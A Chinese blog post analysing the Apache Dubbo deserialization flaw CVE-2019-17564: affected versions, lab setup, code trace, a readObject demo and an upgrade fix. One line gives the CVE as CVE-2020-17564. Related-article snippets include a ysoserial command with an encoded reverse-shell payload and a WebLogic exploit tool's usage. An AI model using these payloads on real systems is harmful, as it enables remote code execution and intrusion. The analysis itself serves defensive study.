rmi反序列化导致rce漏洞修复_[漏洞分析]CVE-2019-17564/Apache Dubbo存在反序列化漏洞...

最新推荐文章于 2023-09-07 21:39:49 发布
最新推荐文章于 2023-09-07 21:39:49 发布
阅读量200 收藏
点赞数
文章标签: rmi反序列化导致rce漏洞修复
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39544333/article/details/111890858
版权

漏洞描述

Apache Dubbo支持多种协议,官方推荐使用Dubbo协议.Apache Dubbo HTTP协议中的一个反序列化漏洞(CVE-2019-17564),该漏洞的主要原因在于当Apache Dubbo启用HTTP协议之后,Apache Dubbo对消息体处理不当导致不安全反序列化,当项目包中存在可用的gadgets时即可导致远程代码执行.

CVE编号

CVE-2020-17564

漏洞威胁等级

高危

影响范围

2.7.0 <= Apache Dubbo <= 2.7.4.1

2.6.0 <= Apache Dubbo <= 2.6.7

Apache Dubbo = 2.5.x

漏洞分析

1.环境搭建

下载源码以后,分离出http部分

修改pom.xml中32行dubbo.version

修改其为漏洞版本,以2.7.3为例,随后在Idea中开启即可

修改JDK版本为1.8

随后导入一个可控的gadgets用于分析,例如commons-collections4-4.0,并启动HttpProvider

注:Dubbo启动依赖zookeeper,这部分使用不再赘述,请自行查阅google

2.漏洞分析

我们进入org.apache.dubbo.remoting.http.servlet.DispatcherServlet在43行handler.handle(request, response);处打入断点,利用burp进行发包跟踪它的走向

随后发现其进入org.apache.dubbo.rpc.protocol.http.HttpProtocol中的handle

进一步跟踪

最终进入org.springframework.remoting.rmi.RemoteInvocationSerializingExporter

该ois对象来源为报文中post data部分,对于传入的ois并没有做任何安全过滤和检查,直接就行了readObject方法导致RCE产生.

很多人不太理解Java反序列化漏洞怎么rce,这里给出一段示例代码

使用ysoserial随意生成一个序列化文件,再利用下面的代码读取该序列化文件即可达到效果,可见直接使用readObject方法的危害

import java.io.FileInputStream;

import java.io.ObjectInputStream;

public class test1 {

public test1() {

}

public static void main(String[] args) throws Exception {

FileInputStream fis = new FileInputStream("/Users/xue/Documents/NetSafe/Tools/JavaTools/1.ser");

ObjectInputStream ois = new ObjectInputStream(fis);

ois.readObject();

}

}

漏洞验证

修复建议

升级Apache Dubbo到2.7.5版本

时间轴

[0] 2020/02/10 该漏洞披露邮件公开

[1] 2020/02/13 亚信安全网络攻防实验室分析&复现该漏洞并发布漏洞分析

Reference

weixin_39544333
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WebLogic序列_CVE-2017-3248
09-06
WebLogic序列_CVE-2017-3248 java -jar weblogic_cmd.jar -C pwd -H 192.168.1.1 -P 7001 工具使用方法: -B Runtime Blind Execute Command maybe you should select os type -C (执行命令)Execute Command[need set] -dst path to dst file -H (执行主机)Remote Host[need set] -https enable https or tls -noExecPath custom execute path -os (操作系统类型)Os Type [windows,linux] -P (远程端口)Remote Port[need set] -shell enable shell module -src path to src file -T Payload Type[marshall, collection, streamMessageImpl] -U Uninstall rmi -upload enable upload a file
Apache Tomcat 安全漏洞处理升级tomcat版本操作示例
huawangxin
05-12 3764
假设: tomcat版本 目前 apache-tomcat-8.5.43 漏洞报告提到的涉及问题 Apache Tomcat文件包含漏洞(CVE-2020-1938)【原理扫描】 Apache Tomcat 缓冲区错误漏洞(CVE-2020-13934) Apache Tomcat 安全漏洞(CVE-2020-13935) Apache Tomcat 授权问题漏洞(CVE-2019-17563) Apache Tomcat 信息泄露漏洞CVE-2020-17527) Apache Tomcat 安全漏
Apache Tomcat 授权问题漏洞 CVE-2019-17563
淡淡的心
07-20 1万+
Apache Tomcat 授权问题漏洞Apache Tomcat 授权问题漏洞漏洞简介漏洞来源漏洞公告解决办法 Apache Tomcat 授权问题漏洞 type value CNNVD编号: CNNVD-201912-927 CVE编号: CVE-2019-17563 发布时间: 2019-12-19 危害等级: 高危 漏洞类型: 授权问题 威胁类型: 远程 漏洞简介   Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器
dubbo CVE-2019-17564 CVE-2020-1948 漏洞复现
寒星的博客
06-02 2256
简介 Apache Dubbo是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。 CVE-2019-17564 漏洞简介 Apache Dubbo支持多种协议,官方默认为 Dubbo 协议,但是当用户选择http协议进行通信时,Apache Dubbo 在接受来自消费者的远程调用的POST请求的时候会执行一个序列的操作,由于没有任何安全校验,于是可以造成序列执行任意代码。 影响版本 2.7.0 <= Ap.
【openEuler开源社区】如何为社区修复CVE漏洞
weixin_44569394的博客
06-18 3583
如何为openEuler开源社区修复CVE漏洞
【教程】一些服务器常见漏洞修复方法,亲测超详细
热门推荐
xfxuezhang.cn
09-14 2万+
一些常见的漏洞修复
Apache Tomcat漏洞复现
最新发布
m0_56578216的博客
09-07 1067
来到vulhub/tomcat/tomcat8/靶场。
CVE-2019-17564漏洞复现[基于Ubuntu 16.04 LTS]
rep_Su的博客
02-15 4859
基于Ubuntu 16.04 LTS的CVE-2019-17563漏洞复现0x0 漏洞描述0x1 影响范围0x2 漏洞复现环境准备环境搭建漏洞展示0x3 其他修复建议关于此文参考链接 0x0 漏洞描述 Apache Dubbo支持多种协议,官方推荐使用 Dubbo 协议,CVE-2019-17564是属于Apache Dubbo HTTP协议中的一个序列漏洞,该漏洞的主要原因在于当Apache...
《Vulhub-Aapche Dubbo Java序列漏洞(CVE-2019-17564)》
weixin_47118413的博客
12-29 782
在之前我想起在Vulhub漏洞平台复现过Aapche Dubbo Java序列漏洞(CVE-2019-17564),虽然不是最新的(CVE-2022-39198)漏洞,但也想把(CVE-2019-17564)分享一下。
Apache Dubbo(CVE-2019-17564) Java序列漏洞复现笔记(最详细版本)
精品博客,你值得一看~
08-25 832
java -jar ysoserial-master-2874a69f61-1.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4NC4xMzYvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" > 2.poc #生成弹shell的脚本2.poc ,这里将刚刚复制的内容贴到双引号里面执行。
CVE-2021-26295-Apache-OFBiz:CVE-2021-26295 Apache OFBiz rmi序列POC
03-25
CVE-2021-26295-Apache-OFBiz CVE-2021-26295 Apache OFBiz rmi序列POC需要将ysoserial.jar放置在目录下,并且不能使用java的高版本
146-从Java RMI序列到内网沦陷.pdf
09-20
146-从Java RMI序列到内网沦陷.pdf
RMI.rar_Java RMI_java.rmi_java.rmi.Remot_remote
09-20
Java RMI (Remote Method Invocation 远程方法调用)是用Java在JDK1.1中实现的,它大大增强了Java开发分布式应用的能力。
Aapche Dubbo 序列漏洞复现(CVE-2019-17564)
0xSec
12-24 721
Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。
rmi 序列漏洞_Dubbo序列漏洞复现分析(二)
weixin_30480281的博客
12-30 139
成功弹出计算机5.漏洞分析我们从idea里的报错栈可以看到入口应该是javax.servlet.http.HttpServlet.service我们在this.service处下个断点我们用postman发个包,然后跟进去,发现它会用handler函数处理request,response随后发现其进入org.apache.dubbo.rpc.protocol.heep.HttpProto...
2020年10月Oracle安全补丁:四个远程无凭证漏洞 两个内核级别漏洞需关注
Enmotech的博客
10-22 2468
墨墨导读:Oracle 公司发布了最新一期的数据库重要补丁更新建议,我们整理和分析10月号的内容以便供用户和读者参考。数据技术嘉年华,十周年盛大开启,点我立即报名!大会以“自研·智能·新...
rmi 序列漏洞_[漏洞分析]CVE201917564/Apache Dubbo序列漏洞
weixin_29284885的博客
01-07 222
漏洞描述Apache Dubbo支持多种协议,官方推荐使用Dubbo协议.Apache Dubbo HTTP协议中的一个序列漏洞(CVE-2019-17564),该漏洞的主要原因在于当Apache Dubbo启用HTTP协议之后,Apache Dubbo对消息体处理不当导致不安全序列,当项目包中在可用的gadgets时即可导致远程代码执行.CVE编号CVE-2020-17564...
percona mysql 8.0.18升级到8.0.32
描述不清的男人
04-27 995
3.下载新版本的基础构建rpm,使用rpm -ivh *.rpm --replacefiles 进行安装(--replacefiles 替换属于其它软件包的文件)Oracle MySQL/MariaDB Server 输入验证错误漏洞(CVE-2021-2144)采用本方法,简单便捷,升级多次暂未出现问题。Oracle MySQL Server 输入验证错误漏洞(CVE-2021-22926)Oracle MySQL Server 输入验证错误漏洞(CVE-2021-35610)
cve_2019_0708_bluekeep_rce
04-06
b'cve_2019_0708_bluekeep_rce' 是一个计算机安全漏洞的名称,也被称为“蓝牙保安漏洞”。这个漏洞允许黑客在未经授权的情况下远程执行代码(RCE),可能导致计算机系统被恶意入侵和控制。该漏洞主要影响运行微软Windows操作系统的计算机,并且已经被修补。建议用户及时更新他们的系统进行保护。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值